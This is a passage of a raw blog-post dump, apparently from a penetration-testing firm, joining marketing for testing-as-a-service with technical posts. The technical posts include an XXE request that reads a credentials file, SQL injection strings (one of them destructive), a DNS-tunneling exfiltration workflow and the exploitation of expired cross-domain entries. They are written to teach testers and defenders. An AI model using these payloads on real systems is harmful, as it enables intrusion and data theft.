Findings

The Findings tab will display all vulnerabilities discovered during the engagement. These findings can be searched, sorted, and filtered directly in this grid, as well as globally. Selecting a row will bring up a wealth of information about that finding.

The finding details present everything a developer would need to know to understand this type of vulnerability, including the overall severity, description, business impact, and remediation instructions for that issue, as well as what CVEs and OWASP categories are associated with that vulnerability.

Selecting the instances tab will bring up all the unique locations this vulnerability was discovered on this asset.

Instances

Inside an instance will be all the information needed to identify the specific vulnerability, including the affected URL and port and what parameters were used in the attack, along with step-by-step verification instructions. These instructions detail how to reproduce the vulnerability so developers can quickly understand and remediate it.

Concluding Thoughts

All these features are available at both the project and global levels. Users can filter, search, and globally prioritize all vulnerabilities and assets that exist in Resolve™. NetSPI has performed our penetration testing services in Resolve™ for over a decade and currently host 50+ million vulnerabilities for our clients – a number which is rapidly increasing.

Be sure to check back in late May for our part two in this series where we’ll discuss additional and new functionality that exists to scale Resolve™ across even the largest organizations.

To learn more about PTaaS, see the below resources:

[post_title] => Penetration Testing as a Service – Scaling to 50 Million Vulnerabilities [post_excerpt] => The process of assessing third-party penetration testing vendors is the start of a long-term relationship that is core to your security testing program. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => penetration-testing-as-a-service-scaling-to-50-million-vulnerabilities [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:54:14 [post_modified_gmt] => 2021-04-14 00:54:14 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=18462 [menu_order] => 513 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 17343 [post_author] => 53 [post_date] => 2020-02-29 11:32:22 [post_date_gmt] => 2020-02-29 11:32:22 [post_content] =>
Watch Now

Overview 

Your organization is always-on and your security should be too. Whether managing an annual penetration test or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Learn how Penetration Testing as a Service (PTaaS) scales and operationalizes continuous penetration testing in an ongoing, consumable fashion. 

Key highlights: 

Cybersecurity risk is increasing 

Cybersecurity risk is at an all-time high and 96 percent of organizations breached don’t use basic security practices. Because of increased risk, point-in-time testing can’t be the sole method to remain secure. While annual penetration testing can be a baseline or starting time, additional measures are needed to keep up with continually expanding attack surfaces and sophisticated threat actors.   

The CISO dream state 

More than half (55 percent) of companies increased their security budgets in 2019. Given evolving threats, the ideal experience CISOs expect from security vendors includes the following elements:

  • Full confidence in coverage 
  • Access to live information and actionable findings 
  • Ease of doing business and communicating 
  • Accelerated remediation  
  • Personalized experience 
  • Enhanced reporting capabilities 

Traditional penetration testing 

Many cybersecurity vendors that have been in business for a long time tend to focus more on traditional, point-in-time penetration testing, meaning that once the engagement kicks off, they scan for vulnerabilities, provide a report, and that’s it until the time comes for another penetration test. 

Steps in traditional penetration testing include:

  • Presale 
  • Kickoff 
  • Execution 
  • Delivery 
  • Remediation  

Penetration Testing as a Service  

Rather than relying on point-in-time penetration testing, which doesn’t account for emerging vulnerabilities, new attack surfaces, or evolving threats, NetSPI provides Penetration Testing as a Service (PTaaS).

Through pentesting as a service, an expert penetration testing team is available for organizations as needed. This may include scoping a new engagement, parsing real-time vulnerability reports, assisting with remediation, or ensuring compliance year-round.  

Effective pentesting as a service shouldn’t simply end with sharing a PDF of results, but rather, should focus on discovering vulnerabilities, delivering results, and remediating continuously throughout the year.

Penetration Testing as a Service through Resolve™, NetSPI’s vulnerability management and orchestration platform, focuses on an ongoing approach to cybersecurity, rather than a point in time. PTaaS streamlines the pentesting process for organizations and ensures a frictionless and simplified experience through a single platform.

Learn more about NetSPI’s Penetration Testing as a Service capabilities and schedule a demo to see our platform in action.

[wonderplugin_video iframe="https://youtu.be/9TXt-7FMFCI" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Scaling Your Security Program with Penetration Testing as a Service [post_excerpt] => Your organization is always-on and your security should be too. Learn how Penetration Testing as a Service scales and operationalizes continuous pentesting in an ongoing, consumable fashion. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => scaling-your-security-program-with-penetration-testing-as-a-service [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:17:31 [post_modified_gmt] => 2023-09-01 12:17:31 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17343 [menu_order] => 80 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 16505 [post_author] => 31 [post_date] => 2020-02-05 07:00:06 [post_date_gmt] => 2020-02-05 07:00:06 [post_content] => On Feb. 4, 2020, NetSPI Product Manager Jake Reynolds was featured in TechTarget’s WhatIs.com defining Pentesting as a Service. Pentesting as a Service (PTaaS) is a cloud service that provides information technology (IT) professionals with the resources they need to conduct and act upon point-in-time and continuous penetration tests. The goal of PTaaS is to help organizations build successful vulnerability management programs that can find, prioritize and remediate security threats quickly and efficiently. In IT security, it is common practice for businesses to hire reputable, white hat testers to come in and proactively look for attack vectors that could be exploited. Inviting an outside entity to try and breach a network, server or application may sound counter-intuitive, but it’s also one of the best ways to identify and remediate difficult-to-spot security issues. Read the full article here. [post_title] => What Is.com Word of the Day: Pentesting as a Service (PTaas) [post_excerpt] => On Feb. 4, 2020, NetSPI Product Manager Jake Reynolds was featured in TechTarget’s WhatIs.com defining Pentesting as a Service. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-is-com-word-of-the-day-pentesting-as-a-service-ptaas [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:32:27 [post_modified_gmt] => 2021-04-14 05:32:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=16505 [menu_order] => 540 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 16327 [post_author] => 31 [post_date] => 2020-02-04 07:00:21 [post_date_gmt] => 2020-02-04 07:00:21 [post_content] =>

Study after study shows that business leaders across the country place cybersecurity in their top concerns for 2020. PwC’s 23rd annual CEO Survey shows that 53% of U.S. CEOs are “extremely concerned” about the effect cyber threats will have on growth prospects.

And the findings of the Conference Board are similar. According to the survey, cybersecurity was the top concern for CEOs in 2019. What’s more, according to the study, cybersecurity budgets are increasing, with more than 70% of responding CEOs globally planning to increase their cybersecurity budgets this year. Interestingly, cybersecurity strategy remains elusive: almost 40% of responding CEOs globally say their organizations lack a clear strategy to deal with the financial and reputational impact of a cyberattack or data breach.

Often, we see that an inadequate security test can leave a company with a false sense of security. Couple that with the fact that in 2019 the average cost of a data breach to a company was $3.9 million, and a greater business challenge emerges. The bottom line is that organizations are always-on, so their security should be too. It’s more critical than ever that organizations implement a more proactive strategy to better understand their security weaknesses and vulnerabilities.

Penetration testing, delivered in a consumable fashion, and executed monthly or quarterly, rather than annually, can help. At NetSPI we call it Penetration Testing as a Service or PTaaS. Here’s all you need to know before investing in PTaaS, to achieve a successful vulnerability testing and management program.

An Introduction to PTaaS

PTaaS is the delivery model of combined manual and automated pentesting producing real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

A successful PTaaS program delivers security testing comprised of an expert manual pentesting team enhanced by automation. It puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and have the ability to perform always-on continuous testing.

The Case for PTaaS

According to PwC, cyber threats are a drag on growth, and tolerances for breaches and trust in technology are plummeting. To combat these trends, organizations need to shore up resilience. “Step one is to use technology to get real-time views into your most critical processes and assets, and then set up for continuous resilience,” it states.

Organizations with a mature security program understand that point-in-time testing is not the best option for continuously securing their applications and networks. New code and configurations are released every day; a continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.

PTaaS should be viewed as an essential IT department activity for identifying exploitable security vulnerabilities present across all networks in computing devices, such as desktop operating systems, web applications, mobile apps, and more. It proactively hardens an environment by identifying security weaknesses and software vulnerabilities, and then prioritizing them by severity of outcome should they be exploited, as factored against the likeliness of the attack. [Want to read more about penetration testing, a commonly misunderstood security discipline? Grab a cup of coffee and enjoy.

Choosing the Best PTaaS Partner for Your Business

When evaluating PTaaS options, security professionals would be well advised to:

  • Insist on real-time accessible reporting and not settle for reams and reams of static PDF reports that don’t allow for access to data in real-time as vulnerabilities are found.
  • Look for a platform, dashboard or technology efficiencies, that offer increased speed to remediation and direct communication with the pentesting experts. For example, NetSPI’s platform houses all vulnerability data and provides remediation guidance for real-time access and assessment.
  • Prioritize non-negotiables like employing a team of expert deep-dive manual pentesting professionals with enhanced automation, as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.

As attack surfaces constantly grow and evolve, it’s important to recognize that point-in-time penetration testing, while important, is no longer an effective means of year-round security and that there are options available that can increase the value that you get from traditional testing. As an industry, our ultimate goal is to prevent breaches from happening – but, how can we make that happen without having an “always-on” mentality?

Learn more about NetSPI PTaaS here.

[post_title] => Keep Pace with Evolving Attack Surfaces: Penetration Testing as a Service [post_excerpt] => Study after study shows that business leaders across the country place cybersecurity in their top concerns for 2020. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => keep-pace-with-your-evolving-attack-surface-penetration-testing-as-a-service [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:56:13 [post_modified_gmt] => 2021-04-14 00:56:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=16327 [menu_order] => 542 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 8521 [post_author] => 31 [post_date] => 2018-03-27 07:00:38 [post_date_gmt] => 2018-03-27 07:00:38 [post_content] =>

I found myself in the office on Saturday night, mainly because the frozen pizza selection is more expansive than mine at home, and I wanted to get a head start on my project for this week. It was a normal Static Application Security Test (SAST), which follows a mostly pre-defined process, with embellishments depending on the languages and frameworks at play.

The first step in that process is to search for hardcoded passwords. I dug out the simple and ugly password regex I’ve created for this and did a search for /pa?ssw?o?r?d?|pwd/gi across the entire codebase. This regex covers all of the standard ways I've seen "password" used as a variable name in code. Without fail I got back:

Passwordregex

After digging through all the results and parsing out the false positives I ended up with a total of 30 hardcoded passwords. All of them were database connection strings spread across 20 total users, including multiple users with admin access to the database. Our recommendation for this is simple:

Passwords should never be hardcoded in the source code.

Why?

The reasoning behind this is that there are multiple attack paths that result in source code/arbitrary file disclosure. Error messages, public Github repos, arbitrary file read, "oopsies" email attachments, and shoulder surfing being just a few.

A typical escalation path that exploits hardcoded passwords could start with an XML External Entity (XXE) Injection. An application that is vulnerable to XXE will allow us to read (almost) any file on the server. Through this an attacker will fingerprint the technology at play and target the important source code files.  For example, a web application using the Python Django framework will contain a settings.py file. This file will sometimes contain hardcoded passwords for the DB connection. With some luck/bruteforce an attacker can find the source code directory and read the settings.py file via XXE.

HTTP Request:

POST /xxe HTTP/1.1
Host: netspi.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY settings SYSTEM "file:///django-app/settings.py" >]>
<foo>&settings;</foo>

HTTP Response:

HTTP/1.1 200 OK
Content-Length: 178
Connection: close

DATABASES = {
 'default': {
 'ENGINE': 'django.db.backends.mysql',
 'NAME': 'admin',
 'USER': 'admin',
 'PASSWORD': 'password',
 'HOST': 'prod-db.netspi.com',
 'PORT': '3306',
 }
}

An attacker can now take this information and connect directly to the database, which is public-facing because someone assumed authentication was enough. Once an attacker has this amount of access, any number of paths can be followed to further infiltrate the network. This attack extends to anything that requires a password: admin pages, config pages, mail servers, etc...

Remediation

We need various forms of secrets (passwords, api keys, etc...) on the box somehow and the goal is to find the method that minimizes the organization’s risk to the greatest degree. Our suggested remediation regularly has the goal of assigning them through environmental variables on the server. Environmental variables are the recommended method due to the low likelihood of an attacker gaining access to them. I've only seen them exploited in two common scenarios, overly-verbose debug pages left running in prod, or using OS command execution to list all of the environmental variables*. Both of which are easily combatable in large code repositories. Environmental variables also allow a more scalable solution, as rotating secrets will only require one configuration change.

Resources

Like most things in security, except 0days, all the information is out there. A lot of people just aren’t aware of the vulnerability or what the proper way to fix it is. Because of that I won’t rehash how every platform implements environmental variables, but I will identify what I think are the best resources for doing so.

The handling of sensitive data for an app should always be done at the deployment/orchestration level. This ensures that secrets are stored and managed away from the web servers and databases. Here are some of the popular deployment and orchestration frameworks, with their related resources:

Kubernetes

Jenkins

TravisCI

Drone

TeamCity

CircleCI

GitlabCI

AWS

  • This uses IAM roles, which are not discussed in this blog, but are a stronger substitute for environmental variables in AWS applications.

Docker Swarm

  • This is an interesting method using Docker Secrets. Unfortunately they are stored in files, but are the recommended method inside of the Docker ecosystem.

In the end, secrets don't belong in the code. Proper distribution will decrease the reach an attacker has through other methods of attack and protect an organization by allowing them to rotate secrets easily and often.

Coming Up

This blog is an attempt at describing a holistic solution to secret handling that will work in every environment. Using environmental variables is still not the most secure method, as plaintext sensitive information is available to every user on the box. To combat this a platform-specific method is usually required, which Windows and Linux both offer.

We're curious to hear how other organizations handle secrets in their code and what improvements could be made to further advance the topic. Let us know @NetSPI or by leaving a comment below!

* Edit 10:13 AM: Unfortunately environmental variables on linux are still vulnerable to arbitrary file disclosure as seen here https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/.

[post_title] => Please Stop Giving Me Your Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => please-stop-giving-me-your-passwords [to_ping] => [pinged] => [post_modified] => 2023-02-08 19:47:23 [post_modified_gmt] => 2023-02-09 01:47:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8521 [menu_order] => 602 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 8072 [post_author] => 31 [post_date] => 2017-12-19 07:00:05 [post_date_gmt] => 2017-12-19 07:00:05 [post_content] => As penetration testers, the tools, information, and knowledge we have available to us directly correlates to the amount of entry points we can identify and exploit in any environment. The longer we spend researching and developing individual escalation paths reduces the amount of time for digging into other parts of the network or application. Below we discuss some of the problems we've had with SQL injection and its related online resources and introduce our solution to fix them.

Another SQL Injection Wiki?

SQL injections are one of those vulnerabilities that, without a proper knowledge base, can take a surprising amount of time to exploit and still get meaningful results. When you have to exploit them in multiple Database Management Systems (DBMSs) every week it becomes annoying looking up all the queries and table names repeatedly. There are many resources on the internet for various injection types and DBMSs, but they only seem to give a cursory glance of the injections and lack in describing what to do after you successfully exploit one. One of our Senior Consultants, Alexander Leary, brought up this issue and proposed an idea to Ben Tindell and I earlier this year. Ben, who loves a good wiki, and I, who was terrible at advanced SQL injection, really enjoyed the idea of a comprehensive centralized knowledge base for SQL injection. Through that exchange the NetSPI SQL Injection Wiki was born. Like other sites, aggregating the basics of injections was important. But we also wanted to aggregate what data was most valuable and where it resided within the various DBMSs, while adding injection techniques to extract that data, obfuscate queries, pivot further into the internal network, and more. Most importantly we wanted it all in one, easy to understand, place.

Presenting

Today we are open-sourcing our wiki to address the problems listed above. You can view the wiki at https://sqlwiki.netspi.com and you can help contribute to its development on Github. We are striving to make this a teaching tool as much as it is a lookup tool. Beginners will benefit from starting at Step 1: Injection Detection, while experienced testers may want to skip straight to the thick of it at Step 5: Attack Queries. If you think any information is inaccurate, or think there is more information we should add, please feel free to create an issue or submit a pull request. A huge thanks to all those who have already contributed! We’re excited to be releasing this and we will continue to work on making it as informative and intuitive as possible. For the time being, what other vulnerabilities do you waste the most time on Googling for exploits? Let us know on Twitter @NetSPI, or by leaving a comment below! [post_title] => NetSPI SQL Injection Wiki [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-sql-injection-wiki [to_ping] => [pinged] => [post_modified] => 2022-11-09 16:22:03 [post_modified_gmt] => 2022-11-09 22:22:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8072 [menu_order] => 615 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 7976 [post_author] => 31 [post_date] => 2017-09-26 07:00:23 [post_date_gmt] => 2017-09-26 07:00:23 [post_content] => DNS tunneling, in my opinion, is the niftiest data exfiltration method there is. For those not familiar, check out Section 3 from SANS's "Detecting DNS Tunneling" whitepaper here. Our Mobile Application Practice Lead, Aaron Yaeger, recently taught me how easy it is to use Burp Collaborator for DNS tunneling. Exfiltrating data like that was a bit time consuming to do manually, so I set out to automate this task for use in all environments. I automated this task by creating an extension for Burp Suite using the built-in Burp Collaborator API, with a private Burp Collaborator server to parse incoming DNS requests and recreate the tunneled data. The two main ways to use this extension are:

Environments with Burp Suite

In this magical and unlikely environment, the tester has access to Burp Suite on both ends and this extension is installed. In that case the tester goes to the extension on their local box, starts the listening Collaborator instance, and enters the Burp Collaborator address and the data to be exfiltrated on the compromised box’s Burp instance (for full instructions see here).

Environments with Bill and Linus

However, on most compromised boxes there is no Burp Suite, but a scripting engine is usually available (Powershell/Bash). For these environments, I have written Bash and Powershell scripts to tunnel data to Collaborator. These scripts will base32 encode, chunk, and perform DNS queries with the data. The execution chain for a tester looks like this:
  1. Copy over the tunneling script to the compromised box
  2. Click “Start Listening” on the DNS Tunnel extension on the box they want to exfiltrate data to (take note of the Collaborator server address)
  3. Start the script on the compromised box, copy in the Collaborator server address and filename to exfiltrate, and click go
  4. After the data is sent click “Poll now” on the receiving machine and the data will be present
A demo starting at step 2 is below (click to enlarge): DNS tunneling extension demo This is the closest to point-and-shoot that I’ve seen for DNS tunneling, which makes me hope it will give pen testers access to a tool that might have been harder for them to access in the past.  Another great alternative for tunneling is dnscat2, so definitely check that out to see if it fits your needs. Since I’m a big fan of blue teaming I’ll reference the article I posted at the beginning for Detecting DNS Tunneling by Greg Farnham. I should point out that this extension will only work with a private Burp Collaborator Server, as Burp Suite (rightly) doesn’t want their domain getting flagged as malicious when this extension sends hundreds of requests.

Contributing

What is being released today is the 1st revision of this tool. Due to that, it means everything was done the way it popped into my head. If you think there are better ways things could be implemented please feel free to make a pull request or create an issue on Github. You can download the tool at https://github.com/NetSPI/BurpCollaboratorDNSTunnel. [post_title] => DNS Tunneling with Burp Collaborator [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dns-tunneling-with-burp-collaborator [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:24 [post_modified_gmt] => 2021-04-13 00:06:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7976 [menu_order] => 618 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [19] => WP_Post Object ( [ID] => 7536 [post_author] => 31 [post_date] => 2017-05-16 07:00:17 [post_date_gmt] => 2017-05-16 07:00:17 [post_content] => Most penetration testers know the pain of trying to view and modify an unparsed JSON string.  For those that don’t, here’s a taste:
{"userId":1234,"username":"JakeReynolds","favorites":["Rubik's cubes","Doctor Who"],"dislikes":["Sushi","Vegetables"]}
When looking at thousands of these strings a day it is important for them to be well formatted and easily understandable. There currently exists a Burp Extension for beautifying JSON but it is written in Python, which requires Jython to be downloaded and added to Burp.  There were also some issues with Jython and that extension not being as dependable as hoped. Due to those reasons we ported that functionality to Java which is run natively by Burp. Java makes this extension one-click install, with support from Google’s GSON parser. The source code can be found on our Github as well as PortSwigger’s Github which includes updated build instructions. To install, simply go to Burp > Extender > BApp Store and select “JSON Beautifier”. The next time there is a JSON request in any of the Burp tabs there will be the option of “JSON Beautifier”. Any content modified in this tab will also be modified in the “Raw” tab.  An example is below: Jsonbeautifierwalkthrough Thanks for checking out our Burp Extension! If you would like any features added feel free to create an issue on Github. [post_title] => Beautifying JSON in Burp [post_excerpt] => Most penetration testers know the pain of trying to view and modify an unparsed JSON string. This Burp extension removes that burden and allows live editing of beautified JSON strings. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => beautifying-json-in-burp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:49 [post_modified_gmt] => 2021-06-08 21:51:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7536 [menu_order] => 629 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 6852 [post_author] => 31 [post_date] => 2017-04-25 07:00:58 [post_date_gmt] => 2017-04-25 07:00:58 [post_content] => If there’s anything to be learned from Gitlab’s recent downtime (which they handled amazingly well), it’s that production databases need to be pampered.  They aren’t something to play around with and as penetration testers that responsibility extends to us. Many companies will allow testing in production, it can be argued that it is the responsible thing to do; production is where a company is most likely to get hit and it's important to test those servers.  While everything said in this blog should be followed in non-prod environments, it isn't a catastrophe if non-prod data is modified.  As a penetration tester it starts becoming catastrophic when one mistake in production can lead to outages and having to restore from backups, if they even exist.  There has to be a way to test SQL Injection without the risk of modifying production data accidentally. A google search for “Safe SQL Injection” will return 0 relevant results.  Surely others have written on this topic and other NetSPI employees have mentioned how they go about this, but the goal of this blog is to make this subject visible and easily accessible.

Setup

Starting with setting up the databases, 3 popular Relational Database Management Systems and their associated syntaxes will be used.
RDBMS Create Table
MySQL 5.7.12
CREATE TABLE USERS (
username VARCHAR(100)  NOT NULL,
password VARCHAR(100) NOT NULL,
email VARCHAR(100)    NOT NULL
)
;
MSSQL Server 2014 Express Edition
CREATE TABLE USERS
(username varchar(100), 
password varchar(100), 
email varchar(100))
;
Oracle SQL 12c
CREATE TABLE USERS
("username" VARCHAR2(100),
"password" VARCHAR2(100),
"email" VARCHAR2(100)
)
/
Go ahead and add some users as well.
RDBMS Add Users
MySQL 5.7.12
INSERT INTO USERS (username, password, email) values
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com');
MSSQL Server 2014 Express Edition
INSERT INTO USERS
(username, password, email) VALUES
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com');
Oracle SQL 12c
INSERT into USERS ("username", "password", "email") values 
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com')
/

Pen Tester's First Day at Work

Now every database has a table called USERS with the structure:
   username password email
1 jake reynolds jreynoldsdev@gmail.com
2 net spi alex@netspi.com
3 johnjacob jingle heimer@schmidt.com
This is usually the first table any pen tester would test against since it is called from every login form.  A simple query is used here:
SELECT username FROM USERS WHERE username='$username' and password='$password';
There’s not much harm to this query, aside from being vulnerable to SQLi.  As a tester tossing in a ' or 1=1 --  here or there won’t hurt anybody.  How about the next time this table comes into play?  When a user wants to update their email address the query looks somewhat like:
UPDATE USERS set email='$email' where username='$username';
Now here’s a weekend ruiner if the test is in production.  Giving this input form the simple test of '; --  can ruin the entire Users table.
UPDATE USERS set email=''; -- where username = '$username';
   username password email
1 jake reynolds
2 net spi
3 johnjacob jingle
CRAP. Every email in the company’s database has been deleted.  Maybe they have backups, but it's not St. Patrick's Day so luck is a little short. What happens now?  Dust off that resume and hope to not make the same mistake with future employers.

How to Keep Future Jobs

There are a couple ways to avoid this mistake and they come down to taking an extra second to think about the query format before inserting injection strings.  Going back to the update query, look at it from another angle.
UPDATE USERS set email='$email' where username='$username';
This would be blind to testers, but it would be behind a request similar to:
POST /updateEmail HTTP/1.1
Host: jakereynolds.co
Connection: close
Content-Length: 165
Content-Type: application/x-www-form-urlencoded

username=jake&email=jreynoldsdev@gmail.com
It’s clear that an email parameter is going to be inserted into a query.  Our goal is to find some strings that can be inserted without ruining everyone’s weekend. The first attempt is string concatenation, breaking out of the query and appending something to our string.  This allows the rest of the query to still be valid and shows if the parameter is vulnerable.
MSSQL MySQL Oracle
'+'concat
con' 'cat'
'||'concat
These strings all result in the query looking similar to:
UPDATE USERS set email=''+'concat' where username='jake';
   username password email
1 jake reynolds concat
2 net spi alex@netspi.com
3 johnjacob jingle heimer@schmidt.com
Now everyone is hunky-dory, but none of the queries are the same across the 3 RDBMS'.  What other options are available for these 3?  MySQL and Oracle allow arithmetic operators on numeric strings.  If the injection does not need to escape a quote, MSSQL can be used as well with integers.
MSSQL MySQL Oracle
1+1
1-1
1/1
1*1
'='test
1'+'1
1'-'1
1'/'1
1'*'1
1'+'1
1'-'1
1'/'1
1'*'1
Using addition from MySQL shows this is possible with strings and numbers.
UPDATE USERS set email='1'+'1' where username='jake';
   username password email
1 jake reynolds 2
2 net spi alex@netspi.com
3 johnjacob jingle heimer@schmidt.com
So all 3 of the RDBMS’ have some options to use, but this is operating under the assumption that it doesn't matter what database is being tested.  What option is there to safely inject a string blindly into any of these 3 databases?

The Blind Leading the Blind

It was difficult to find any operators, functions, etc... that executed in the same way across all 3 databases.  Although, coming up from behind for a cheap 2nd is one operator that works on all 3, just doing different things. In MSSQL the + character acts as a form of string concatenation, as presented above.  MySQL and Oracle initially failed any tests for this operator until it came clear that they are for integer arithmetic.  That gives the magical injection string of:
MSSQL MySQL Oracle
1'+'1
1'+'1
1'+'1
UPDATE USERS set email='1'+'1' where username='jake';

   username password email
1 jake reynolds 2
2 net spi alex@netspi.com
3 johnjacob jingle heimer@schmidt.com
In MSSQL the output will become 11, due to string concatenation. There it is!  We now have an option that will allow us to inject blindly into queries for 3 major RDBMS', without potentially destroying their tables.  The challenge going forward is expanding this to fit more RDBMS' and to fit more complicated scenarios.  That will be left as a challenge to the user, but if you have any other ideas or comments please let us know below! [post_title] => SQL Injection to Help You Sleep at Night [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-injection-help-sleep-night [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:28 [post_modified_gmt] => 2021-04-13 00:06:28 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6852 [menu_order] => 632 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [21] => WP_Post Object ( [ID] => 6930 [post_author] => 31 [post_date] => 2017-02-21 07:00:54 [post_date_gmt] => 2017-02-21 07:00:54 [post_content] => When someone buys a domain name the usual purchase length is one year, with certain DNS providers allowing multi-year purchases.  Large entities can quickly lose track of all their domains and keeping track of when those domains expire can be an even bigger hassle.  When you add Flash integration into the mix it starts becoming a security issue. Adobe Flash has been known to have many vulnerabilities in the past, and my favorite is actually a feature.  Flash has the feature of respecting a cross-domain policy for inter-site communication; the crossdomain.xml file lists valid external domains that can make requests to the Victim Site (VS).  An example crossdomain.xml looks like this:
<cross-domain-policy>
<allow-access-from domain="valid.com"/>
<allow-access-from domain="testing.com"/>
<allow-access-from domain="example.com"/>
</cross-domain-policy>

Any of those sites have full cross-domain access to the VS.  Many blogs have covered the topic of overly-permissive cross domain policies with rules like <allow-access-from domain="*"/>  that allow access from any site.  This blog will cover the topic of expired domains that are allowed in cross-domain files, allowing an attacker to purchase that domain and gain full cross-domain access.

Cross-Domain Scanner

As stated before, cross-domain exploitation has been well documented so I will link tutorials on defeating CSRF on the expired domains below, here is how we can go about discovering those domains using my crossdomainscanner python script located here.

Prerequisites

~$ git clone https://github.com/NetSPI/crossdomainscanner
~$ cd crossdomainScanner
~$ pip install -r requirements.txt
I’ll start with identifying the VS I would like to scan, for this demo I’ll be using https://jakereynolds.co.  A VS can be found any number of ways and we can verify it has a cross-domain policy by accessing https://jakereynolds.co/crossdomain.xml.   We’ll then feed this into the cross-domain scanner with the command:
python scanner.py https://jakereynolds.co -v
Once the script is finished it will tell us if there are any expired domains in the policy.
Possible expired domains:
asdaasdasfwkjhcjhbwrgkljsv.com
thisisanexpireddomainaswell.es
jakereynoldsexpireddomain.com
We now know that https://jakereynoldsexpireddomain.com can gain cross-domain access to https://jakereynolds.co, instantly eliminating any CSRF protection that might have existed on the site.

Exploitation

The best way to exploit this is to take advantage of the CSRF bypass.  Purchase the expired domain, make someone visit your site, and if they are logged in on the VS you can make requests under the context of their account.  This will be done by creating a Flash application for manipulating requests, more on that here.  If the VS does not have any valuable APIs the cross-domain access does not warrant a valid finding, since nothing can be exploited from it.

Findings

Out of the Top 5000 Alexa domains:
  • 222 allow cross-origin requests from any domain (*)
  • 20 allow cross-origin requests from expired domain names
  • 20 allow cross-origin requests from domains with invalid TLDs (.local, .des, etc…)

Recommendation

As a site owner/maintainer it is best to run this script against your own domain and remove or repurchase any expired domains allowed in your crossdomain.xml file.  For long-term monitoring it would be good to incorporate this tool into your development pipeline so that it gets checked at least once every production deployment.  A permanent fix would be to remove Flash integration with the website, since Flash is already being deprecated in certain browsers.

References

